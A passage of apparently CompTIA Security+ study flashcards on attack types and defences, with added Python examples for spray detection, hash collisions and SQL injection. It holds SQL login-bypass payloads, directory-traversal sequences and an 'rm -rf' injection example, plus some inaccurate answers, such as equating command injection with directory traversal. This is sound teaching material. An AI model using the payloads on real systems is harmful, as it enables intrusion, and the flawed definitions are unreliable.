Level of sophistication – Script kiddies are typically the least sophisticated, whereas nation-states would be the most sophisticated.

Resources and funding – Nation-states would have the most time, resources, and funding, followed by organized crime. Script kiddies would have the least resources available.

Intent and motivation – The intent of a script kiddie might be to simply prove that they can do it, whereas the intent and motivation of a hacktivist could be a moral or political issue.

125
Q

Your organization has asked the security team to add terrorist attacks to the organization’s business continuity plan. Which type of threat does this most likely represent?

A) Internal threat
B) Politically motivated threat
C) Supply system threat
D) Natural environmental threat

A

A terrorist attack is most likely a politically motivated threat. A terrorist attack is usually carried out by a group that opposes the philosophical or political beliefs of a particular country or institution, and a particular group often takes credit for it. Politically motivated threats include strikes, riots, civil disobedience, and terrorist attacks.

126
Q

What is a supply system threat?

A

Supply system threats include power outages, communications interruptions, and water and gas interruption.

127
Q

You must prepare a presentation that describes different security attacks against your enterprise. Match the descriptions on the left with the application attacks on the right.

Buffer overflow - an attack that occurs when an application receives more data than it is programmed to accept

Zero-day attack - an attack that allows code injection by hackers into the Web pages viewed by other users

Session hijacking - an attack that occurs when user validation information is stolen and used to establish a connection

Cross-site scripting - an attack that occurs on the day when an application vulnerability has been discovered

A

Buffer overflow – an attack that occurs when an application receives more data than it is programmed to accept

Cross-site scripting (XSS) – an attack that allows code injection by hackers into the Web pages viewed by other users

Session hijacking – an attack that occurs when user validation information is stolen and used to establish a connection

Zero-day attack – an attack that occurs on the day an application vulnerability has been discovered, that is, before the vendor has released a patch (the vendor has had zero days to fix it)

128
Q

A man wearing a service provider’s coveralls and carrying a toolbox approaches your facility’s security guard. He says that his work crew is running some new Ethernet cable inside your office, but he left his mobile phone at home, so he can’t call his crew to let him in. The security guard admits the man through your secured door. The following week you find an undocumented network device installed in a closet.

Which social engineering attack techniques were used? (Choose all that apply.)

A) Pretexting
B) Eliciting information
C) Identity fraud
D) Impersonation
E) Influence campaign

A

The attacker used pretexting and impersonation to commit physical social engineering. Pretexting (when referring to social engineering) is inventing a scenario that will engage the victim and provide the attacker with an excuse to be in the area. Impersonation is pretending to be an employee, vendor, IT help desk staff, delivery driver, or other individual with some level of legitimate access. Impersonation can occur on the phone or in person. In this scenario, the guard should have asked an employee inside the building to verify that an authorized work crew was on the grounds.

While this was an impersonation, it was not identity fraud. Identity fraud is stealing a specific individual’s PII or credentials to commit financial fraud, elicit information, gain access to confidential records, or penetrate a network. Impersonation is generic, while identity fraud is specific.

The attacker did not elicit information. Eliciting information is tricking the victim into revealing sensitive information, like shift times and manned desk hours, through friendly conversation.

An influence campaign is a multi-actor attack that uses social media accounts to post inflammatory rhetoric and unsubstantiated or fake news stories. The goal of the disinformation is to cause political, social, and economic instability in the target. Influence campaigns are usually conducted by APTs and hostile nation-states.

Physical social engineering uses in-person techniques to gather confidential information or gain access. Other human vector or physical social engineering tricks are dumpster diving, shoulder surfing, tailgating / piggybacking, and reconnaissance. Remember that in the CompTIA objectives, reconnaissance can mean visiting a target to observe security controls in person, but it can also refer to digital and remote intelligence gathering techniques using OSINT and automated tools.

129
Q

A user reports that she is unable to access a file server. You discover that there are numerous open connections on the file server from several servers and routers.

Which type of attack has affected the file server?

A) denial-of-service (DoS) attack
B) man-in-the-middle attack
C) privilege escalation
D) backdoor attack

A

The file server has become the victim of a denial-of-service (DoS) attack. Because multiple routers and servers are involved in the attack, a distributed DoS (DDoS) attack has actually occurred. A DDoS attack usually involves the hijacking of several computers and routers to use as agents of the attack. Multiple servers and routers involved in the attack often overwhelm the bandwidth of the attack victim. For example, if a server has intermittent connection issues, the logs show repeated connection attempts from the same IP addresses, and the attempts are overloading the server to the point it cannot respond to traffic, then the server is experiencing a DDoS attack.

130
Q

What is privilege escalation?

A

Privilege escalation usually occurs by logging in to a system using your valid user account and then finding a way to access files or functions that you do not have permission to use. This often involves invoking a program that runs with higher rights than the caller, such as a binary with the Set User ID (SUID) or Set Group ID (SGID) bit set, or a service that runs in an administrative context. There are several methods of dealing with privilege escalation, including using least privilege accounts, privilege separation, and so on. Privilege escalation can lead to denial-of-service (DoS) attacks. An example of privilege escalation is gaining access to a file you should not access by changing the permissions of your valid account. Privilege escalation is also a concern for users with administrative-level accounts. If a user needs administrative-level access, the user should be given two user accounts: one administrative-level account and one regular user account. The user should use the regular user account for most activities and use the administrative-level account only to perform administrative duties.

131
Q

What is backdoor access?

A

Backdoors are hidden ways into a system that bypass normal authentication. Some are created by vendors so that they can access their own devices; others are planted by attackers after a compromise so that they can return later. After installing new devices or operating systems, you need to ensure that all backdoors and default passwords are either disabled or reset. Often, hackers first attempt to use such backdoors and default passwords to access new devices.

132
Q

What is man-in-the-middle-attack?

A

A man-in-the-middle attack occurs when a hacker intercepts messages from a sender, modifies those messages, and sends them to a legitimate receiver.

133
Q

Management is worried about an evil twin. Which of the following BEST describes this entity?

A) signals about the wireless network marked on the outside of a building

B) an unauthorized access point

C) cracking the WEP secret key using the initialization vector (IV)

D) an access point with the same SSID as the legitimate access point

A

An evil twin is an access point with the same SSID as the legitimate access point. It is a special type of unauthorized access point.

134
Q

What do site surveys help mitigate?

A

A rogue access point is an unauthorized access point that allows access to a secure network. Performing a site survey is the best way to discover rogue access points. Discovering a large number of unauthorized wireless connections in a particular area is a sign of a rogue access point.

135
Q

What is an IV attack?

A

An IV attack is cracking the WEP secret key using the initialization vector (IV). WEP's 24-bit IVs repeat quickly on a busy network, and because each IV is sent in the clear, an attacker who captures enough frames can recover the RC4 key stream and then the key itself. An IV attack therefore involves capturing wireless traffic in an attempt to gain unauthorized access to a wireless network.

136
Q

What is interference Jamming?

A

Another consideration in wireless networks is interference or jamming. Interference is usually accidental; jamming is a deliberate denial of service on the radio band. If an organization implements multiple wireless access points, the organization must ensure that the access points do not interfere with each other. This can be accomplished in one of two ways: deploy neighbouring access points on non-overlapping channels within the frequency band, or decrease the power level of the access point. Also, some electronic devices, such as microwave ovens and cordless phones, can cause interference with access points. Often, just moving the wireless access point fixes the issue.

137
Q

Which of the following is based on impersonating an executive in an organization, with the intent of convincing an employee to do something they shouldn’t?

A) Misinformation
B) Business email compromise
C) Brand impersonation
D) Typo-squatting

A

Business email compromise is an attack that exploits the name and/or position of a high-ranking executive within the organization. The attacker will impersonate the executive in an email to the victim, typically an employee in the organization, asking them to perform tasks. One of the most common examples asks an employee to purchase dozens of gift cards.

138
Q

What is Brand Impersonation?

A

Brand impersonation, also known as brand spoofing, is a type of phishing attack. Attackers will use a legitimate company’s assets, such as logos, banners, and images, to make it appear as though the email is coming from the legitimate company. The attackers may also create a fake website that mimics the legitimate website. As an example, the attacker creates a fake website that looks like a legitimate banking website. The attacker then sends an email to users asking them to log in to their account by clicking on the link to the fraudulent website. When the user enters their login credentials, the attacker can steal their information and use it for fraudulent purposes.

139
Q

What is misinformation and disinformation?

A

Misinformation and disinformation are types of influence campaigns designed to swing public opinion in a certain direction. Misinformation is the spread of incorrect information, usually because the initial facts were incorrect or misunderstood, without the intent to deceive. Disinformation is crafting and spreading deliberately inaccurate or false information with the intent to deceive.

140
Q

Which of the following threat actor motivations is also known as a competition attack?

A) Philosophical beliefs
B) Revenge
C) Ethical hacking
D) Espionage

A

Competition attacks are the modern version of industrial espionage. Theft of intellectual property, marketing plans, and customer lists are all examples that can have devastating effects on the targeted organization. Even stealing the victim company’s credit card list can have a severe economic impact on that company. Often, the attacking company will find a disgruntled individual in the subject company to carry out the attack.

141
Q

Provisioning requests for the IT department have been backlogged for months. You are concerned that employees are using unauthorized cloud services to deploy VMs and store company data. Which of the following services can be used to bring this shadow IT back under the corporate security policy?

A) SLA
B) SWG
C) CASB
D) VPN

A

A cloud access security broker (CASB) enforces proper security measures between a cloud solution and a customer organization. A CASB monitors user activities, notifies administrators about significant events, performs malware prevention and detection, and enforces compliance with security policies.

142
Q

What is SWG?

A

A secure web gateway (SWG) is a cloud-based web gateway that combines features of a Next-generation Firewall (NGFW) and a Web Application Firewall (WAF). SWG provides an ongoing update to filters and detection databases and is designed to provide filtering services between cloud-based resources and on-premises resources. SWG uses standard WAF functions, TLS decryption, CASB functions, sandboxing features, and threat detection functions to protect enterprises from the ever-evolving cloud-based risks and attacks.

143
Q

Match the attacks on the left with the mode of attack given on the right.

Pharming - Social networks
Spimming - Email
Vishing, Smishing - Web Browser
Phishing - Mobile Phone

A

Pharming – Web browser
Phishing – Email
Spimming – Social networks
Vishing, Smishing – Mobile phone

144
Q

Which of the following is not a cryptographic attack?

A) Downgrade
B) Spraying
C) Birthday
D) Collision

A

A spraying attack is not a cryptographic attack, but rather a type of brute-force password attack. Instead of trying many passwords against one account, which trips account lockout thresholds, it tries one or two likely passwords against many accounts. It may use a common or default password for an organization and test that against every account in a user list. "P@$$w0rd" is a common choice because it satisfies typical complexity rules, and in a larger organization you are likely to find an account that uses it. Another form uses a variation of the company's slogan or name, often combined with the current season or year, against the user list.
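Detection logic for the spray pattern described above, run over sample authentication log lines, as an added example (not code from the original flashcards). The log lines and their key=value format are constructed for illustration; the two detectors show why a spray is invisible to a per-account failure counter and has to be keyed on the source instead.

```python
# Added example (not from the original flashcards): telling a password
# spray apart from a classic brute-force attempt in authentication logs.
# The log lines below are constructed for illustration, in a made-up
# "key=value" format; adapt parse() to your own log source.
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

SAMPLE_LOG = """\
2024-03-01T09:00:01Z result=FAIL user=alice src=203.0.113.5
2024-03-01T09:00:02Z result=FAIL user=bob src=203.0.113.5
2024-03-01T09:00:03Z result=FAIL user=carol src=203.0.113.5
2024-03-01T09:00:04Z result=FAIL user=dave src=203.0.113.5
2024-03-01T09:00:05Z result=FAIL user=erin src=203.0.113.5
2024-03-01T09:00:06Z result=FAIL user=frank src=203.0.113.5
2024-03-01T09:02:10Z result=FAIL user=heidi src=192.0.2.9
2024-03-01T09:02:25Z result=OK user=heidi src=192.0.2.9
2024-03-01T09:05:00Z result=FAIL user=grace src=198.51.100.7
2024-03-01T09:05:01Z result=FAIL user=grace src=198.51.100.7
2024-03-01T09:05:02Z result=FAIL user=grace src=198.51.100.7
2024-03-01T09:05:03Z result=FAIL user=grace src=198.51.100.7
2024-03-01T09:05:04Z result=FAIL user=grace src=198.51.100.7
2024-03-01T09:05:05Z result=FAIL user=grace src=198.51.100.7
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) result=(?P<result>\w+) user=(?P<user>\S+) src=(?P<src>\S+)$")


def parse(line: str) -> Optional[Dict]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def failures(log: str) -> List[Dict]:
    return [ev for ev in map(parse, log.splitlines()) if ev and ev["result"] == "FAIL"]


def _peak_in_window(events: List[Dict], window: timedelta, distinct_field: str = None) -> int:
    """Sliding window over time-sorted events. With distinct_field set, the
    peak number of distinct values of that field inside any window; without
    it, the peak number of events inside any window."""
    events = sorted(events, key=lambda e: e["ts"])
    counts: Counter = Counter()
    lo, peak = 0, 0
    for hi, ev in enumerate(events):
        counts[ev[distinct_field] if distinct_field else hi] += 1
        while ev["ts"] - events[lo]["ts"] > window:
            old = events[lo][distinct_field] if distinct_field else lo
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            lo += 1
        peak = max(peak, len(counts))
    return peak


def detect_spray(log: str, window: timedelta = timedelta(minutes=10),
                 min_accounts: int = 5) -> List[Tuple[str, int]]:
    """One source, many accounts, one or two failures each: the spray
    signature. Per-account lockout never trips, so key on the source."""
    by_src = defaultdict(list)
    for ev in failures(log):
        by_src[ev["src"]].append(ev)
    return [(src, n) for src, evs in by_src.items()
            if (n := _peak_in_window(evs, window, "user")) >= min_accounts]


def detect_brute_force(log: str, window: timedelta = timedelta(minutes=10),
                       threshold: int = 5) -> List[Tuple[str, str, int]]:
    """Many failures against one account from one source: the classic pattern."""
    by_key = defaultdict(list)
    for ev in failures(log):
        by_key[(ev["user"], ev["src"])].append(ev)
    return [(user, src, n) for (user, src), evs in by_key.items()
            if (n := _peak_in_window(evs, window)) >= threshold]


if __name__ == "__main__":
    print("spray sources :", detect_spray(SAMPLE_LOG))
    print("brute force   :", detect_brute_force(SAMPLE_LOG))
```

Real sprays are slower and spread across many source addresses, so in production the window is hours rather than minutes and the grouping key is often the user-agent or autonomous system rather than a single IP; the logic is the same.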

144
Q

Cryptographic attack: Collision attack?

A

A collision attack is a cryptographic attack that uses brute force over many different inputs to find two that produce the same hash value.

144
Q

Cryptographic attack: Downgrading?

A

A downgrade attack is a cryptographic attack that causes the system to use less-stringent security controls. When these less-stringent (downgraded) security controls, typically insecure protocols, are activated, the attacker takes advantage of those less-than-secure settings. An example is an on-path attacker that rewrites HTTPS links to HTTP (SSL stripping) or interferes with the TLS handshake so that the parties settle on an older protocol version or weaker cipher suite. HTTP is a less secure protocol than HTTPS, and the attacker exploits the unprotected traffic. HTTP Strict Transport Security (HSTS) and disabling legacy protocol versions on servers are the usual mitigations.

145
Q

Cryptographic attack: Birthday attack?

A

A birthday attack is a type of cryptographic attack against hash functions. It is named after the birthday paradox: in a room of only 23 people the probability that some two share a birthday already exceeds 50%. Likewise, finding any two inputs that hash to the same value takes roughly the square root of the number of possible outputs (about 2^(n/2) attempts for an n-bit hash), far fewer than the 2^n attempts needed to match one specific value.

146
Q

Which of the following physical attacks is exemplified by making a copy of an employee’s access badge?

A) RFID cloning
B) Tampering
C) Brute force
D) Environmental attacks

A

RFID cloning is the process of creating a copy of an RFID card or key fob that grants access to a facility. RFID cards contain a small chip that contains data about the holder of the card, such as their name, company role, and authorization to enter facilities. These cards use short-range radio waves to send this data to readers, which then use the card as a “key” to open doors. Hackers can clone these cards by using a card reader within reading distance of a card, and they can snag the data that is loaded on the chip remotely. This data can then be copied over to a blank card, and the hacker can essentially pose as a legitimate actor and use their RFID copy to go anywhere the real employee can.

A practical example of RFID cloning is when a hacker gains access to a facility by cloning an employee’s RFID card. The hacker can then move around the facility undetected and access sensitive areas. To prevent such attacks, businesses can leverage other forms of security hardware to fully protect their premises and maintain authorized access control. For example, a CCTV camera pointed at the card reader can detect and record any tampering by a hacker trying to install a skimmer. Likewise, cameras that have a field of vision over the approach to the front door reader can pick up on suspicious behavior, like a person with a bag trying to get within RFID-reading distance of employees and linger there.

147
Q

Management has asked you to provide mitigations against certain attack types. Match the Web site application code attack types on the left with the mitigations given on the right. Choose the mitigation that BEST applies to the attack.

A

The attacks and their mitigations should be matched in the following manner:

Cross-site request forgery (CSRF) – Validate requests on both the client and server side (in practice with per-session anti-CSRF tokens and SameSite cookie attributes).

Cross-site scripting (XSS) – Implement input validation.

Session hijacking – Encrypt communications between the two parties.

Malicious add-ons – Implement application allow lists.

It is important that you understand application attacks and how to prevent them.

148
Q

Management has recently become worried about DNS poisoning after reading an article about it. Which of the following BEST describes this attack?

A) the practice of dispensing IP addresses and host names with the goal of traffic diversion

B) the practice of continually sending synchronization messages with spoofed packets to a DNS server

C) the practice of one computer transmitting malformed packets to a DNS server to cause the server to crash

D) the practice of many computers transmitting malformed packets to a DNS server to cause the server to crash

A

DNS poisoning is the practice of dispensing IP addresses and host names with the goal of traffic diversion. Properly configured DNS security (DNSSEC) on the DNS server can provide message validation, which, in turn, would prevent DNS poisoning.

149
Q

What is ARP posioning?

A

ARP poisoning is the local-network counterpart of DNS poisoning. In this attack, a malicious actor sends falsified ARP messages over a local area network so that the attacker's MAC address becomes associated with the IP address of another host, typically the default gateway, which lets the attacker intercept or modify traffic (an on-path attack). Dynamic ARP inspection on switches and static ARP entries for critical hosts are common mitigations. In a domain hijacking attack, by contrast, the registration of a domain name is changed without the permission of the original registrant.

150
Q

Which cryptographic attacks attempt to produce the same hash value from a brute force attack using two inputs? (Choose two.)

A) Birthday
B) Replay
C) Collision
D) Weak Implementations

A

A collision attack or a birthday attack uses brute force with many different inputs to find two inputs that produce the same hash value. When two separate inputs create the same hash value, it is called a collision. A birthday attack is named after the birthday paradox, the surprisingly high probability that two people in a small group share the same birthday.
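A birthday search that actually finds a collision, as an added example (not code from the original flashcards) for the collision and birthday cards. It truncates SHA-256 to 32 bits purely so the search finishes in about a second; the arithmetic it prints applies to any hash width, and the message prefix is constructed.

```python
# Added example (not from the original flashcards): a birthday (collision)
# search against SHA-256 truncated to a small number of bits, contrasted with
# the cost of a brute-force second preimage. Truncation is only so the search
# finishes in a second; the arithmetic is the same for any hash width.
import hashlib
import math
from typing import Tuple


def trunc_hash(data: bytes, bits: int) -> int:
    """Top `bits` bits of SHA-256(data), as an integer."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def find_collision(bits: int, prefix: bytes = b"msg-") -> Tuple[bytes, bytes, int]:
    """Birthday attack: hash distinct messages until any two agree.
    Returns the colliding pair and how many hashes were computed."""
    seen = {}
    n = 0
    while True:
        msg = prefix + str(n).encode()
        h = trunc_hash(msg, bits)
        if h in seen:
            return seen[h], msg, n + 1
        seen[h] = msg
        n += 1


def birthday_expected(bits: int) -> float:
    """Expected hashes before the first collision among 2**bits values,
    ~ sqrt(pi/2 * 2**bits): the square root of the output space."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def preimage_expected(bits: int) -> float:
    """Expected hashes to hit one specific target value (brute force)."""
    return 2.0 ** bits


if __name__ == "__main__":
    bits = 32
    a, b, tries = find_collision(bits)
    print(f"{a!r} and {b!r} share the top {bits} bits: {trunc_hash(a, bits):#010x}")
    print(f"found after {tries} hashes; expected ~{birthday_expected(bits):.0f}")
    print(f"brute-forcing a chosen target would take ~{preimage_expected(bits):.0f}")
```

This is why an n-bit hash offers only about n/2 bits of collision resistance: a 128-bit digest such as MD5 is bounded by roughly 2^64 work against generic collisions even before its structural weaknesses are considered, and the memory the search needs (one entry per hash computed) is the main practical cost.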

151
Q

What is a replay attack?

A

In a replay attack, the attacker sends the victim a previously accepted frame, such as one that includes a cryptographic key that has been sniffed by the attacker. The victim believes he is still in a valid communication, but the communication has been intercepted and exploited.

152
Q

What is the primary goal of buffer overflow attacks?

A) Cross-site scripting
B) Memory injection
C) SQL injection
D) Malicious update

A

Memory injection is the primary goal of buffer overflow attacks. Buffer overflows attempt to put more information than can fit into an allocated area of memory. With memory injection, the attacker inserts malicious code into program memory. The computer then executes that malicious code as part of the program.

153
Q

What is an SQL injection?

A

An SQL injection is an example of improper input handling: user-supplied text is concatenated into a query and changes the structure of the query itself. The impact can include data destruction or unfettered access to the database. The primary defense is parameterised (prepared) queries, which keep data separate from the query text; checking inputs for common SQL injection characters is at best a secondary control. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, and proper date ranges.
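The same login query built by string formatting and by parameter binding, run against an in-memory SQLite table, as an added example (not code from the original flashcards). The users and passwords are constructed, and the table stores passwords in clear only to keep the injection visible; a real system stores password hashes.

```python
# Added example (not from the original flashcards): the same login query
# built by string formatting and by parameter binding, run against an
# in-memory SQLite table. Users and passwords are constructed; a real
# system stores password hashes, never the passwords themselves.
import sqlite3
from typing import List


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "hunter2"), ("george", "pa55word")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Improper input handling: user input becomes part of the SQL text,
    so quotes and comment markers change the query's structure."""
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> List[str]:
    """Parameterised query: the driver sends the values separately from the
    statement, so a quote in the input is just a character in a string."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


if __name__ == "__main__":
    conn = setup_db()
    for user, pw in (("admin", "hunter2"),
                     ("admin' --", "anything"),            # comment out the password check
                     ("x' OR '1'='1", "x' OR '1'='1")):    # make the WHERE clause always true
        print(f"{user!r:22} vulnerable={login_vulnerable(conn, user, pw)} "
              f"safe={login_safe(conn, user, pw)}")
```

The two payloads illustrate the two classic effects: the comment marker removes the password check entirely, and the OR clause makes the predicate true for every row, which is how an injection turns a login form into a dump of the table.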

154
Q

What is XSS attack?

A

A cross-site scripting (XSS) attack occurs when an attacker finds a vulnerability on a website that allows the attacker to inject script into a web application's pages, where it runs in other users' browsers. A persistent (stored) XSS attack occurs when data provided to the web application is first stored on the server and later displayed to users without being HTML-encoded. A non-persistent (reflected) XSS attack occurs when data provided by a web client is used immediately by server-side scripts to generate the response for that user. XSS flaws occur whenever an application takes user-supplied data and sends it to a web browser without first validating or encoding the data.

155
Q

Recently there was a DoS attack on one of the servers, which succeeded in taking the server down for three hours. You would like to deploy a solution that would allow you to detect a huge rush of traffic to a specific device and route it somewhere away from the device. What technique could you use?

A) Endpoint security
B) System isolation
C) Sinkholes
D) Network segmentation

A

You could use a sinkhole. A sinkhole is a routing mechanism that can route traffic from a device being flooded to a location where the traffic can be studied.

156
Q

Your company underwent an attack that involved an attacker injecting a command to access the underlying file system. Which type of attack occurred?

A) privilege escalation
B) DLP
C) directory traversal
D) resource exhaustion

A

In a directory or path traversal attack, an attacker uses the application to access the file system beneath it. Usually, this means figuring out which folder the application serves files from and then stepping out of that folder into other folders on the system with ../ sequences (or their URL-encoded forms such as %2e%2e%2f) in a file name parameter. The fix is to resolve the requested path and refuse anything that does not land inside the intended folder.

157
Q

Where is steganography typically used?

A) In voice calls
B) As a removable device exploitation
C) In executable file-based attacks
D) In an image-based attack

A

Steganography is typically used in image-based attacks, but can also be used with audio and video files. Steganography works by embedding messages or malicious code within images. The large size of these files makes it difficult to find the embedded data, unless you know exactly where to look and what to look for. This allows the attacker to transmit while “hiding in plain sight.”

158
Q

What is a file-based threat vector?

A

A file-based threat vector is a type of cyberattack conducted via executable files on a computer or network. Attackers can use this method to gain unauthorized access to sensitive data, install malware, or cause other types of damage. For example, an attacker might send an email with an attachment that contains malicious code. When the user opens the attachment, the code executes and infects the computer with malware. Other examples of file-based threat vectors include downloading files from untrusted sources, using outdated software, and opening files from unknown sources. File-based threat vectors inject malicious code into what would seem to be a harmless file. Typical targets are spreadsheets and document files. One example of this type of malicious code is a macro.

159
Q

Why can USB drives and external hard drives be exploited?

A

Removable device exploitation can occur with USB drives or external hard drives. Attackers can use this method to load malware onto systems to launch cyber-attacks, with the aim of stealing sensitive information and causing system failures. For example, an attacker might leave a USB drive in an organization’s parking lot or send it as a gift to a target. Once the user inserts the device into their computer, the malware on the device can spread to other removable media or network drives, infecting the entire system.

160
Q

Which two options are threat vectors used against vulnerable software? (Choose two.)

A) Agentless
B) Unsupported systems and applications
C) Client-based
D) Default credentials

A

Client-based attacks and agentless attacks are used against vulnerable software.

Client-based attacks exploit vulnerabilities within software running on a computer or mobile device. An example could be a vulnerability within a web browser that allows an attacker to install malware on the computer.

Agentless attacks use web applications and services to acquire information from a computer or mobile device. The acquisition can occur without the need of a software installation on the device.

161
Q

What are default credentials considered to be?

A

Default credentials are a common threat vector, but they primarily target hardware devices like routers and wireless access points. Someone will configure a device, such as a new router, and forget to change the default credentials used for setup. These credentials rarely vary within a brand, and a list of default credentials for many devices can be found at https://www.softwaretestinghelp.com/default-router-username-and-password-list/.

162
Q

You have discovered that data was injected into your database, thereby causing security issues. Which injection attack most likely occurred?

A) XML injection
B) SQL injection
C) LDAP injection
D) command injection

A

An SQL injection affects a database. In this type of attack, the interface expects a user to enter data, but it is not properly designed to allow only a specific data type, so a malicious user can enter SQL code instead.

163
Q

What is command injection?

A

Command injection allows users to gain access to restricted directories. If an operating system command, such as rm -rf /etc/password, is submitted in an HTML string, a command injection (or directory traversal) attack has occurred. Command injection is also referred to as directory traversal.

164
Q

What is XML injection?

A

XML injection occurs when a user enters values in an XML query that takes advantage of security loopholes.

165
Q

What is LDAP injection?

A

LDAP injection occurs when a user enters values in an LDAP query that takes advantage of security loopholes.

166
Q

What is header manipulation?

A

Header manipulation is an attack that occurs when a hacker is able to manipulate a packet header to deface, hijack, or poison the packet.

167
Q

What are malicious add-ons?

A

A malicious add-on is an application add-on that a user installs for a particular functionality but that in reality serves as a way for a hacker to create a security breach.

168
Q

Recently, an attacker tricked a user into believing he was selecting a button that would direct him to a legitimate website, but that button actually took him to another site. Which type of attack occurred?

A) Clickjacking
B) Driver manipulation
C) Amplification
D) Pass the hash

A

Clickjacking involves putting a transparent button over an existing button (or image) on a web page. When the victim clicks the button, instead of going to the website they intended, they are routed to a different site where the attacker captures personal information. Amplification attacks are often part of a DDoS attack, usually associated with UDP protocols. The goal of this attack is to turn a simple query, such as DNS or NTP, into a flood of responses that overwhelms the victim’s network resources.

169
Q

What are pass-the-hash attacks?

A

Pass-the-hash attacks exploit authentication protocol weaknesses, where the password hash remains the same between sessions until the password value changes.

170
Q

What are driver manipulation attacks?

A

Driver manipulation attacks change the information provided to a device driver. This results in the driver not being used at all or performing with unexpected results.

171
Q

What is Shimming?

A

Shimming is a form of driver manipulation. An API library is created that changes the arguments (parameters) passed to the driver, bypasses the driver, or handles the driver operation within the API itself.

172
Q

What is Refactoring?

A

Refactoring identifies the flow within an application’s code and changes the code without changing how the code appears to function. This is often used to identify exploitation opportunities in a weak area of an application’s code.

173
Q

As part of your monthly report, you must classify specific vulnerabilities into a broad range of vulnerability types. Which type of vulnerability is demonstrated by an SQL injection?

A) Misconfiguration/weak configuration
B) Default configuration
C) Improper input handling
D) Improper error handling

A

An SQL injection is an example of improper input handling, and the impact can include data destruction or unfettered access to the database. Inputs should be checked for common SQL injection symbols. Other examples of improper input handling include failure to validate the type of data in an input field, the length of the data, and proper date ranges.

Improper error handling could allow an attacker to crash a program. Error checking should be built into every module or code function. An error should not result in a crashed application, but rather generate an error message.

Misconfiguration or weak configuration can have a severe impact. For example, a user who (for convenience) selects weak or minimal security settings on a browser may impact the security of the entire organization. Misconfiguration, such as not changing the administrative username or password, can also have a significant impact. Systems and components, such as routers, should never be deployed with the default configuration enabled. As an example, many SOHO users are thrilled that they got their new wireless network to finally communicate “out of the box.” As a result, they do not change the default administrator information, leaving their network wide open for attack.

174
Q

Which of the following transmits data via Wi-Fi or Bluetooth only to a host device and is vulnerable to data interception and attack?

A) UAV
B) Medical devices
C) Automobiles
D) Wearable technology

A

Wearable technology transmits data via Wi-Fi or Bluetooth to a host device, and as such is subject to data interception and attack. In addition to being subject to attack, wearable devices such as voice recorders, video recorders, and hidden cameras can also be used by an attacker to gain information.

UAVs operate far beyond the range of Wi-Fi and Bluetooth. Unmanned Aerial Vehicles (UAVs) or drones are controlled remotely, which is an inherent security risk. Aircraft/UAVs have multiple embedded systems, ranging from navigation to fuel control and ordnance delivery. Significant security systems must be incorporated to prevent these airborne vehicles from being compromised.

Medical devices transmit via wired connections, Wi-Fi, Bluetooth, or radio frequency (RF) signals established by the Wireless Medical Telemetry Service (WMTS) within the specific frequency bands allocated to medical devices. Medical devices can be manipulated to report false data, resulting in harm to the patient. They can also be manipulated to provide the wrong level of service to a patient, such as the flaw that was announced by the FDA with pacemakers whereby unauthorized users could manipulate the heartbeat rate or cause the battery to drain at a faster rate.

Automobiles with embedded technology are susceptible to hackers, but they usually use satellite or cellular communication. As an example, an air pressure sensor on a tire can be manipulated to show a low-pressure alert. When the consumer fills the tire sufficiently so that the alert stops, the tire is now overinflated. This can cause the tire to explode at highway speeds. Recently, security professionals have even demonstrated hacking into an automobile and driving it.

175
Q

In security operations, which of the following would provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness?

A) System processes
B) Windows registry
C) Logging levels
D) System hardening

A

System processes provide well-defined operational guidelines for processes such as incident response, security policy, vulnerability management, and security awareness, to name a few. A Security Operations Center (SOC) operates 24x7 to maintain the organization’s security posture. The above-mentioned system processes provide the guidelines that the SOC uses for its operations.

The Windows registry is a database that contains all the application settings and current configuration parameters for the hardware and software on a Windows system. Each machine running a Windows OS has a registry that contains keys (which identify applications, processes, hardware) and values (specific configuration data related to the key). For example, if a key was related to a printer, values associated with the key could include printing orientation, print history, default paper tray, and default paper size.

Logging levels are classifications that indicate the severity or urgency of the logged event. Common logging levels include Emergency, Alert, Critical, Error, Warning, Notice, and Debug.

System hardening increases the security of a server or a computer system by reducing vulnerabilities and the attack surface. Examples of system hardening activities include removing unnecessary software, closing down ports, and adjusting permissions.

Other important operating system (OS) concepts include the location of configuration files and hardware architecture in Windows and Linux.

The Windows OS uses the registry database for storing all configuration settings. In Linux, each application and process has its own configuration file. The Linux file structure uses the /etc/ directory for configuration file locations.

Hardware architecture is also an important concept. If the hardware is not secure, it would be very difficult to build secure applications and databases and to have high availability. Physical access to critical hardware, such as servers, routers, wireless access points, and network switches, is often overlooked. It is not uncommon that administrative passwords are set to the default, firmware does not get updated, and encryption is not adequate for the device.